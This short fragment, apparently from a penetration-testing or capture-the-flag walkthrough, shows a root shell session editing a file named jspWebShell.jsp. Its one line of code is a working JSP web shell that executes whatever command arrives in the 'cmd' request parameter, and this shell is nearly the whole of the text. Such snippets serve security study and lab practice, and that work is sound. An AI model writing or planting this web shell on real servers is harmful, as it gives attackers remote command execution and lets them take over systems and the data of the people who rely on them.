root@oco:~$ nano jspWebShell.jsp ... <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> ...
Last updated 6 months ago